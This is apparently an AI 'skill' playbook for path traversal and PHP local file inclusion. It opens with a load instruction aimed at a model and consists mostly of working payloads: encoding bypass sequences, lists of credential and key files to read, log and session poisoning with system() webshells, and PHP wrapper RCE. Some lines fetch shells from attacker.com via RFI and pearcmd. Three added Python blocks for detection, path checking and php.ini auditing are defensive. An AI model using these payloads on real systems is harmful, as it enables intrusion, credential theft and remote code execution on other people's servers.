path-traversal-lfi


SKILL: Path Traversal / Local File Inclusion (LFI) — Expert Attack Playbook


AI LOAD INSTRUCTION: Expert path traversal and LFI techniques. Covers encoding bypass sequences, OS differences, filter bypass, PHP wrapper exploitation, log poisoning to RCE, and the critical distinction between path traversal (read only) vs LFI (execution). Base models miss encoding chains and RCE escalation paths.

0. RELATED ROUTING


Before deep exploitation, first load:
  • Insecure file upload: when the primary attack surface is an upload workflow rather than an include or read primitive

First-pass traversal chains


../etc/passwd
../../../../etc/passwd
..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252fetc%252fpasswd
..\..\..\windows\win.ini

1. CORE CONCEPT


Path Traversal: read arbitrary files by escaping the intended directory with ../ sequences.
LFI: in PHP, when user input controls include() / require(), the file is executed as PHP code, not just read.

http://target.com/index.php?page=home
→ Opens: /var/www/html/pages/home.php

Traversal attack:
http://target.com/index.php?page=../../../../etc/passwd
→ Opens: /etc/passwd

2. TRAVERSAL SEQUENCE VARIANTS


The filtering strategy determines which encoding to use:

Basic

../../../etc/passwd
..\..\..\windows\system32\drivers\etc\hosts  (Windows)

URL Encoding

%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd     ← %2f = '/'
%2e%2e%5c%2e%2e%5c%2e%2e%5c                  ← %5c = '\'

Double URL Encoding (when server decodes once, filter checks before decode)

%252e%252e%252f%252e%252e%252f  ← %25 = %, double-encoded %2e
..%252f..%252fetc%252fpasswd

Unicode / Overlong UTF-8

..%c0%af..%c0%af     ← overlong UTF-8 encoding of '/'
..%c1%9c..%c1%9c     ← overlong UTF-8 encoding of '\'
..%ef%bc%8f          ← fullwidth solidus '/'

Mixed Encodings

..%2F..%2Fetc%2Fpasswd
....//....//etc/passwd   ← double-dot with slash (filter strips single ../)

Filter Strips ../ (so ....// becomes ../ after the strip)

....//          ← becomes ../ after a non-recursive filter strips ../
..././          ← becomes ../ after a non-recursive filter strips ../

Null Byte Injection (legacy PHP < 5.3.4)

../../../../etc/passwd%00.jpg   ← %00 truncates the string, dropping the .jpg extension
../../../../etc/passwd%00.php

3. TARGET FILES AND ESCALATION TARGETS


Linux

/etc/passwd                  ← user list (usernames, UIDs)
/etc/shadow                  ← password hashes (requires root-level file read)
/etc/hosts                   ← internal hostnames → pivot targets
/etc/hostname                ← server hostname
/proc/self/environ           ← process environment (DB creds, API keys!)
/proc/self/cmdline           ← process command line
/proc/self/fd/0              ← stdin file descriptor
/proc/[pid]/maps             ← memory maps (loaded libraries with paths)
/var/log/apache2/access.log  ← for log poisoning
/var/log/apache2/error.log
/var/log/nginx/access.log
/var/log/auth.log            ← SSH attempt log
/var/mail/www-data           ← email for www-data user
/home/USER/.ssh/id_rsa       ← SSH private key
/home/USER/.ssh/authorized_keys
/home/USER/.bash_history     ← command history (credentials!)
/home/USER/.aws/credentials  ← AWS keys
/tmp/sess_SESSIONID          ← PHP session files (if session.save_path=/tmp)

Web Application Config Files

/var/www/html/.env           ← Laravel/Node.js env vars
/var/www/html/config.php     ← PHP config
/var/www/html/wp-config.php  ← WordPress DB credentials
/etc/apache2/sites-enabled/  ← Apache vhosts
/etc/nginx/sites-enabled/    ← Nginx config
/usr/local/etc/nginx/nginx.conf

Windows

C:\Windows\System32\drivers\etc\hosts
C:\Windows\win.ini
C:\Windows\System32\config\SAM          ← NTLM hashes (often locked)
C:\inetpub\wwwroot\web.config           ← ASP.NET DB connection strings
C:\inetpub\wwwroot\global.asa
C:\xampp\htdocs\wp-config.php
C:\Users\Administrator\.ssh\id_rsa
C:\ProgramData\MySQL\MySQL Server 8\my.ini  ← MySQL config

4. PHP LFI → RCE TECHNIQUES


Log Poisoning (most reliable when log is accessible)


Step 1: Inject PHP code into the Apache/Nginx access log via User-Agent:
GET / HTTP/1.1
User-Agent: <?php system($_GET['cmd']); ?>
Step 2: Include the log file via LFI:
?page=../../../../var/log/apache2/access.log&cmd=id

SSH Log Poisoning


Inject the PHP payload as the SSH username:
ssh '<?php system($_GET["cmd"]); ?>'@target.com
Then include /var/log/auth.log.

PHP Session File Poisoning


Step 1: Send PHP code in a session-stored parameter (e.g., username), so it is written to the session file.
Step 2: Include the session file:
?page=../../../../tmp/sess_SESSIONID&cmd=id
Find the session ID in the PHPSESSID cookie.

PHP Wrappers for RCE


expect:// wrapper (requires the expect PHP extension):
?page=expect://id
php://input wrapper (combine LFI with a POST body):
POST ?page=php://input
Body: <?php system('id'); ?>
data:// wrapper (inject PHP directly as base64):
?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=&cmd=id
(PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4= = <?php system($_GET['cmd']); ?>)
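Detection logic for the log-poisoning and wrapper payloads described in this section and in section 12, as an added example (not part of the original playbook): it parses Apache combined-format access log lines, constructed here, and flags PHP tags in any logged field, stream-wrapper schemes in query parameters (including data: without slashes and percent-encoded forms) and embedded null bytes.

```python
"""Flag LFI wrapper abuse and log-poisoning attempts in Apache access logs.

Added example, not code from the original playbook. The wrapper schemes and
the PHP-tag-in-User-Agent pattern are the ones sections 4 and 12 describe;
the log lines in SAMPLE_LOG are constructed.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Stream wrappers that turn include($page) into code execution or source disclosure;
# data: is matched with and without "//" because PHP accepts both spellings.
WRAPPER_RE = re.compile(r"(?i)\b(?:php://(?:filter|input)|data:(?://)?|expect://|phar://|zip://)")
# The long <?php tag and the short echo tag <?=
PHP_TAG_RE = re.compile(r"(?i)<\?(?:php\b|=)")


def fully_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode until stable so %252e-style double encoding is seen plainly."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyse(line: str) -> list:
    """Return the findings for one log line; an empty list means nothing suspicious."""
    m = LOG_RE.match(line.strip())
    if m is None:
        return ["unparseable-line"]
    rec = m.groupdict()
    findings = []
    # A PHP tag in any logged field is the log-poisoning precondition: if this
    # file is later include()d through LFI, that text executes as PHP.
    for field in ("request", "agent", "referer"):
        if PHP_TAG_RE.search(fully_decode(rec[field])):
            findings.append(f"php-tag-in-{field}")
    parts = rec["request"].split(" ")
    target = parts[1] if len(parts) >= 2 else ""
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = fully_decode(value)
        if WRAPPER_RE.search(value):
            findings.append(f"wrapper-in-param:{name}")
        if "\x00" in value:                      # %00 / %2500 truncation attempt
            findings.append(f"null-byte-in-param:{name}")
    return findings


def scan(lines) -> list:
    """Pair each suspicious line's client address with its findings."""
    results = []
    for line in lines:
        findings = analyse(line)
        if findings:
            m = LOG_RE.match(line.strip())
            results.append((m.group("host") if m else "?", findings))
    return results


SAMPLE_LOG = [  # constructed lines: one benign request followed by four probes
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Oct/2023:13:55:40 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php system($_GET[\'cmd\']); ?>"',
    '10.0.0.9 - - [10/Oct/2023:13:55:41 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=config.php HTTP/1.1" 200 2048 "-" "curl/8.0"',
    '10.0.0.9 - - [10/Oct/2023:13:55:42 +0000] "GET /index.php?page=data%3Atext%2Fplain%2C%3C%3Fphp%20system(%27id%27)%3B%3F%3E HTTP/1.1" 200 64 "-" "curl/8.0"',
    '10.0.0.9 - - [10/Oct/2023:13:55:43 +0000] "GET /index.php?page=..%252f..%252fetc%252fpasswd%2500.jpg HTTP/1.1" 500 0 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for host, findings in scan(SAMPLE_LOG):
        print(host, findings)
```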

5. PHP FILTER WRAPPER (FILE CONTENT READ)


Use php://filter to base64-encode file content, which avoids null bytes and binary data:
?page=php://filter/convert.base64-encode/resource=config.php
?page=php://filter/convert.base64-encode/resource=/etc/passwd
?page=php://filter/read=string.rot13/resource=config.php
?page=php://filter/convert.iconv.UTF-8.UTF-16LE/resource=config.php
Decode the returned base64 to see the file contents (including PHP source code).
Chain filters (multiple transforms to bypass input filters):
?page=php://filter/convert.base64-encode|convert.base64-encode/resource=/etc/passwd

6. REMOTE FILE INCLUSION (RFI) — WHEN ENABLED


If PHP's allow_url_include = On (rare but exists):
?page=http://attacker.com/shell.txt
?page=ftp://attacker.com/shell.php
Host a shell.txt containing <?php system($_GET['cmd']); ?>.

7. SERVER-SPECIFIC PATH TRUNCATION


PHP has a historical path length limit. Pad with . or /./ to truncate an appended extension:
?page=../../../../etc/passwd/./././././././././././............ (255+ chars)
When the server appends .php, the truncation drops it.
Or use a null byte if PHP < 5.3.4:
?page=../../../../etc/passwd%00

8. PARAMETER LOCATIONS TO TEST


?file=        ?page=        ?include=    ?path=
?doc=         ?view=        ?load=       ?read=
?template=    ?lang=        ?url=        ?src=
?content=     ?site=        ?layout=     ?module=
Also test: HTTP headers, cookies, form action values, import/upload features.

9. FILTER BYPASS CHECKLIST


When ../ is stripped or blocked:
□ Try URL encoding: %2e%2e%2f
□ Try double URL encoding: %252e%252e%252f
□ Try overlong UTF-8: ..%c0%af / ..%ef%bc%8f
□ Try mixed: ..%2F or ..%5C (backslash on Linux)
□ Try redundant sequences: ....// or ..././ (strip once → still ../)
□ Try null byte: /../../../etc/passwd%00
□ Try absolute path: /etc/passwd (if no path prefix added)
□ Try Windows UNC (Windows server): \\127.0.0.1\C$\Windows\win.ini
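The defensive side of sections 2 and 9, as an added example that is not code from the original playbook: naive_strip is the single-pass filter the ....// and ..././ sequences defeat, canonicalize undoes the encodings listed above (percent, double percent, overlong UTF-8, fullwidth solidus, NUL, backslash) and resolve_page checks containment after normalisation. BASE_DIR and ALLOWED_PAGES are constructed values.

```python
"""Resolve a user-supplied page name safely against a base directory.

Added example, not code from the original playbook. Shows why a strip-once
filter fails against "....//" and "..././", then a resolver that fully decodes
the input before checking that the normalised path stays inside BASE_DIR.
BASE_DIR and ALLOWED_PAGES are constructed for the example.
"""
import posixpath
from typing import Optional
from urllib.parse import unquote_to_bytes

BASE_DIR = "/var/www/html/pages"
ALLOWED_PAGES = {"home": "home.php", "about": "about.php"}


def naive_strip(user_path: str) -> str:
    """The bypassable filter: deletes '../' in one pass, so '....//' collapses to '../'."""
    return user_path.replace("../", "")


def canonicalize(user_path: str, max_rounds: int = 3) -> Optional[str]:
    """Fully decode untrusted input; None means the request must be rejected."""
    raw = user_path.encode("utf-8")
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(raw)
        if decoded == raw:
            break
        raw = decoded
    else:
        return None                       # still changing after max_rounds: nested %25 encoding
    try:
        text = raw.decode("utf-8")        # strict decode rejects overlong %c0%af / %c1%9c
    except UnicodeDecodeError:
        return None
    if "\x00" in text:                    # %00 truncation
        return None
    if "\\" in text or "\uff0f" in text:  # backslash traversal, fullwidth solidus %ef%bc%8f
        return None
    return text


def resolve_page(user_path: str, base_dir: str = BASE_DIR) -> Optional[str]:
    """Return the absolute path to open, or None if it would escape base_dir."""
    text = canonicalize(user_path)
    if text is None or text.startswith("/"):
        return None                       # absolute paths are never valid page names
    full = posixpath.normpath(posixpath.join(base_dir, text))
    if not full.startswith(base_dir + "/"):
        return None                       # normpath resolved a ../ chain outside the base
    return full


def resolve_allowlisted(page: str, base_dir: str = BASE_DIR) -> Optional[str]:
    """Preferred fix: never build a path from input; map a token to a known file."""
    filename = ALLOWED_PAGES.get(page)
    return None if filename is None else posixpath.join(base_dir, filename)


if __name__ == "__main__":
    for p in ("home", "../../../../etc/passwd", "..%252f..%252fetc%252fpasswd",
              "..%c0%af..%c0%afetc/passwd", "....//....//etc/passwd"):
        print(f"{p!r:40} strip-once -> {naive_strip(p)!r:22} resolve -> {resolve_page(p)!r}")
```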

10. IMPACT ESCALATION PATH


Path traversal (read arbitrary files)
├── Read /etc/passwd → enumerate users
├── Read /proc/self/environ → find API keys, DB passwords in env
├── Read app config files → find credentials → horizontal movement
├── Read SSH private keys → direct server login
└── Find log paths → Log Poisoning → LFI RCE

LFI (PHP code inclusion)
├── Log poisoning → webshell
├── Session file poisoning → webshell  
├── php://input → direct code execution
├── data:// → direct code execution
└── php://filter → read PHP source code → find more vulnerabilities


11. LFI TO RCE ESCALATION PATHS


Method                   | Requirements                        | Payload
-------------------------|-------------------------------------|--------------------------------------------------------------
Log Poisoning (Apache)   | LFI + Apache access.log readable    | Inject <?php system($_GET['c']);?> in User-Agent → include /var/log/apache2/access.log
Log Poisoning (SSH)      | LFI + SSH auth.log readable         | SSH as <?php system('id');?>@target → include /var/log/auth.log
Log Poisoning (Mail)     | LFI + mail log readable             | Send email with PHP in subject → include /var/log/mail.log
/proc/self/fd bruteforce | LFI + Linux                         | Bruteforce /proc/self/fd/0 through /proc/self/fd/255 for open file handles containing injected content
/proc/self/environ       | LFI + CGI/FastCGI                   | Inject PHP in User-Agent header → include /proc/self/environ
iconv CVE-2024-2961      | glibc < 2.39, PHP with php://filter | php://filter/convert.iconv.UTF-8.ISO-2022-CN-EXT/resource= chain to heap overflow → RCE. Tool: cnext-exploits
phpinfo() assisted       | LFI + phpinfo page accessible       | Race condition: upload tmp file via multipart to phpinfo → read tmp path from response → include before cleanup
PHP Session              | LFI + session file writable         | Inject PHP into session via controllable session variable → include /tmp/sess_SESSIONID or /var/lib/php/sessions/sess_SESSIONID
Upload race              | LFI + upload endpoint               | Upload PHP file → include before server-side validation/deletion

12. PHP WRAPPER EXPLOITATION MATRIX


php://filter (most powerful, always try first)


php://filter/convert.base64-encode/resource=index.php
php://filter/read=string.rot13/resource=index.php
php://filter/convert.iconv.utf-8.utf-16/resource=index.php
php://filter/zlib.deflate/resource=index.php

Filter chain RCE (synacktiv php_filter_chain_generator):
  • Chain multiple convert.iconv filters to write arbitrary bytes without file upload
  • Tool: synacktiv/php_filter_chain_generator → generates a chain that writes PHP code
  • python3 php_filter_chain_generator.py --chain '<?php system("id");?>'

convert.iconv + dechunk oracle (blind file read):
  • Tool: synacktiv/php_filter_chains_oracle_exploit (filters_chain_oracle_exploit)
  • Enables blind LFI to read file contents character by character

php://input


POST vulnerable.php?page=php://input
Body: <?php system('id'); ?>
Requires allow_url_include=On

data://


data://text/plain,<?php system('id');?>
data://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOyA/Pg==
data:text/plain,<?php system('id');?>    ← the variant without the double slash also works

phar://


phar://uploaded.phar/test.php
Triggers deserialization of phar metadata → RCE via POP chain (requires upload of a crafted phar, which can be disguised as a JPEG)

zip://


zip://uploaded.zip%23shell.php    ← %23 = '#', separating the archive from the member file

expect://


expect://id
Requires the expect extension (rare)

13. PEARCMD LFI EXPLOITATION


When pearcmd.php is accessible via LFI (common in Docker PHP images):

Method        | Payload
--------------|-------------------------------------------------------------------
config-create | /?file=pearcmd.php&+config-create+/<?=phpinfo()?>+/tmp/shell.php
man_dir       | /?file=pearcmd.php&+-c+/tmp/shell.php+-d+man_dir=<?=phpinfo()?>+-s+
download      | /?file=pearcmd.php&+download+http://attacker.com/shell.php
install       | /?file=pearcmd.php&+install+http://attacker.com/shell.tgz

14. WINDOWS-SPECIFIC LFI TECHNIQUES


FindFirstFile wildcard (Windows only):
  • < matches any sequence of characters and > matches a single character (the file-API analogues of * and ?)
  • php<< can match php5, phtml, etc.
  • ..\..\windows\win.ini → use << for fuzzy matching: ..\..\windows\win<<

15. PARAMETER NAMING PATTERNS (HIGH-FREQUENCY TARGETS)


Based on vulnerability research statistical analysis:

Parameter Name               | Frequency | Context
-----------------------------|-----------|------------------------
filename, file, path         | Very High | Direct file operations
page, include, template      | High      | Template/page inclusion
url, src, href               | High      | Resource loading
download, read, load         | Medium    | File download/read
dir, folder, root            | Medium    | Directory operations
hdfile, inputFile, XFileName | Low       | CMS/middleware specific
FileUrl, filePath, docPath   | Low       | Enterprise app specific

High-frequency vulnerable endpoints: down.php, download.jsp, download.asp, readfile.php, file_download.php, getfile.php, view.php

16. LFI TO RCE — ESCALATION PATHS


1. /proc/self/fd Brute-Force

When file upload exists but the path is unknown:
  • Uploaded files get a temporary fd in /proc/self/fd/
  • Brute-force fd numbers: /proc/self/fd/0 through /proc/self/fd/255
  • Include the temp file before it's cleaned up

2. /proc/self/environ Poisoning

If User-Agent is reflected in the process environment:
GET /vuln.php?page=/proc/self/environ
User-Agent: <?php system($_GET['c']); ?>

3. Log Poisoning

Apache access log:
GET /<?php system($_GET['c']); ?> HTTP/1.1
Then include: /var/log/apache2/access.log

SSH auth log (username field):
ssh '<?php system($_GET["c"]); ?>'@target
Then include: /var/log/auth.log

Mail log (SMTP subject):
MAIL FROM:attacker@evil.com
RCPT TO:victim@target.com
DATA
Subject: <?php system($_GET['c']); ?>
.
Then include: /var/log/mail.log

4. PHP Session File Poisoning

Set a session variable to PHP code:
GET /page.php?lang=<?php system($_GET['c']); ?>
Session file: /tmp/sess_PHPSESSID or /var/lib/php/sessions/sess_PHPSESSID
Then include the session file.

5. phpinfo() Assisted LFI

Race condition: upload via phpinfo() temp file
1. POST a multipart file to the phpinfo() page → the response reveals tmp_name (/tmp/phpXXXXXX)
2. Include the temp file before PHP cleans it up
Requires many concurrent requests (race window ~10ms)

6. iconv CVE-2024-2961

glibc iconv buffer overflow in PHP filter chains
Tool: cfreal/cnext-exploits
Converts LFI to RCE without needing writable paths or log poisoning

---

17. PHP WRAPPER EXPLOITATION MATRIX


php://filter (file read without execution)


Base64 encode source code:
php://filter/convert.base64-encode/resource=index.php

ROT13:
php://filter/read=string.rot13/resource=index.php

Chain multiple filters:
php://filter/convert.iconv.UTF-8.UTF-16/resource=index.php

Zlib compression:
php://filter/zlib.deflate/resource=index.php

NEW: Filter chain RCE (synacktiv php_filter_chain_generator)
Generates chains that write arbitrary content via iconv conversions
Tool: synacktiv/php_filter_chain_generator
python3 php_filter_chain_generator.py --chain '<?php system($_GET["c"]); ?>'
Produces: php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|...|/resource=php://temp

convert.iconv + dechunk Oracle (blind file read)


Error-based oracle: determine whether the first byte of a file matches a given character
Tool: synacktiv/php_filter_chains_oracle_exploit
Reads files byte-by-byte through error/behavior differences

data:// Wrapper


Execute arbitrary PHP:
data://text/plain,<?php system('id'); ?>
data://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOyA/Pg==
Bypass when data:// is filtered but data: (without //) works:
data:text/plain,<?php system('id'); ?>

expect:// Wrapper


expect://id
expect://ls
Requires the expect extension (rare but check)

php://input


POST /vuln.php?page=php://input
Content-Type: application/x-www-form-urlencoded

<?php system('id'); ?>

zip:// and phar:// Wrappers


zip://: upload a ZIP containing a PHP file
zip:///tmp/upload.zip#shell.php

phar://: triggers deserialization of phar metadata!
phar:///tmp/upload.phar/anything
  • Create a malicious phar with a crafted metadata object
  • Can chain to RCE via POP gadget chains (like PHP deserialization)
  • Phar can be disguised as JPG (polyglot phar-jpg)

wrapwrap (prefix/suffix injection)


Tool: ambionics/wrapwrap
Adds an arbitrary prefix and suffix to file content via filter chains
Useful for converting a file read into an XXE, SSRF, or deserialization trigger


---

18. PEARCMD LFI TO RCE


When PEAR is installed and register_argc_argv=On (common in Docker PHP images):

Method 1: config-create (write arbitrary content to file)


GET /index.php?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=phpinfo()?>+/tmp/shell.php

Method 2: man_dir (change docs directory to write path)


GET /index.php?+-c+/tmp/shell.php+-d+man_dir=<?=system($_GET[0])?>+-s+/usr/local/lib/php/pearcmd.php

Method 3: download (fetch remote file)


Method 4: install (install remote package)

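The php.ini preconditions that sections 6, 12 and 18 attach to each RCE path (allow_url_include for RFI, php://input and data:, register_argc_argv for pearcmd.php, the expect extension for expect://, session.save_path under /tmp for session poisoning, a missing open_based) collected into a small configuration audit, as an added example that is not the page's or any project's code; the weak and hardened php.ini texts are constructed.

```python
"""Audit php.ini for the settings that let a file-include bug become RCE.

Added example, not code from the original playbook. Each check mirrors a
precondition the sections above attach to a technique; WEAK_INI and
HARDENED_INI are constructed.
"""
from typing import Dict, List, Optional

PHP_TRUE = {"1", "on", "true", "yes"}   # spellings PHP's ini parser treats as enabled


def php_bool(value: Optional[str]) -> bool:
    """PHP ini booleans: On/1/yes/true in any case, or any non-zero number."""
    if value is None:
        return False
    v = value.strip().lower()
    return v in PHP_TRUE or (v.isdigit() and int(v) != 0)


def strip_comment(raw: str) -> str:
    """Drop a ';' comment, but keep a ';' inside a double-quoted value ("2;/path")."""
    in_quote = False
    for i, ch in enumerate(raw):
        if ch == '"':
            in_quote = not in_quote
        elif ch == ";" and not in_quote:
            return raw[:i]
    return raw


def parse_php_ini(text: str) -> Dict[str, List[str]]:
    """Minimal php.ini reader: ignores [sections] and keeps every value of a
    repeated key, because 'extension=' appears once per loaded extension."""
    settings: Dict[str, List[str]] = {}
    for raw in text.splitlines():
        line = strip_comment(raw).strip()
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        settings.setdefault(key.lower(), []).append(value.strip('"'))
    return settings


def last(settings: Dict[str, List[str]], key: str) -> Optional[str]:
    values = settings.get(key)
    return values[-1] if values else None


def audit(ini_text: str) -> List[str]:
    """One finding per weak setting; an empty list means these checks pass."""
    s = parse_php_ini(ini_text)
    findings = []
    if php_bool(last(s, "allow_url_include")):
        findings.append("allow_url_include=On: include() takes http://, php://input and data: (RFI, code execution); set Off")
    if php_bool(last(s, "allow_url_fopen")):
        findings.append("allow_url_fopen=On: URL wrappers work in fopen()/file_get_contents(), prerequisite for allow_url_include; set Off if unused")
    if php_bool(last(s, "register_argc_argv")):
        findings.append("register_argc_argv=On: the query string becomes $argv, which pearcmd.php abuse via LFI relies on; set Off for web SAPIs")
    if any(v.lower().startswith("expect") for v in s.get("extension", [])):
        findings.append("expect extension loaded: expect:// runs commands on include(); remove it")
    save_path = last(s, "session.save_path")
    if save_path is None or save_path.split(";")[-1].startswith("/tmp"):
        findings.append("session.save_path unset or under /tmp: session files sit at a guessable /tmp/sess_<id> path; use a private directory")
    if not last(s, "open_basedir"):
        findings.append("open_basedir unset: file functions are not confined to the web root; set it to the document root plus required paths")
    return findings


WEAK_INI = """\
[PHP]
; constructed: a container php.ini with every risky switch enabled
allow_url_fopen = On
allow_url_include = On
register_argc_argv = On
extension=mbstring
extension=expect
session.save_path = "/tmp"
"""

HARDENED_INI = """\
[PHP]
allow_url_fopen = Off
allow_url_include = Off   ; no remote or wrapper includes
register_argc_argv = Off
extension=mbstring
session.save_path = "2;/var/lib/php/sessions"
open_basedir = "/var/www/html:/var/lib/php/sessions"
"""
```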

Windows FindFirstFile Wildcard


Windows << and > wildcards in file paths:
<< matches any extension, > matches a single character
include("php<<");   # matches any .php* file
include("shel>");   # matches shell.php if only one character follows

Useful when exact filename is unknown

---

19. PARAMETER NAMING PATTERNS & HIGH-FREQUENCY ENDPOINTS


Common Vulnerable Parameter Names

filename    filepath    path        file        url
template    page        include     dir         document
folder      root        pg          lang        doc
conf        data        content     name        src
inputFile   hdfile      XFileName   FileUrl     readfile

High-Frequency Vulnerable Endpoints

Endpoint Pattern              | Frequency
------------------------------|----------
down.php / download.php       | Very High
download.jsp / download.do    | Very High
download.asp / download.aspx  | High
readfile.php / file.php       | High
export / report endpoints     | Medium
template / preview endpoints  | Medium

Bypass Technique Distribution (from field research)

Technique                         | Prevalence
----------------------------------|----------------------
Absolute path direct access       | Most common
WEB-INF/web.xml read (Java)       | Common
Base64 encoded path parameter     | Moderate
Double URL encoding               | Moderate
UTF-8 overlong encoding (%c0%ae)  | Rare but effective
Null byte truncation (%00)        | Legacy (PHP < 5.3.4)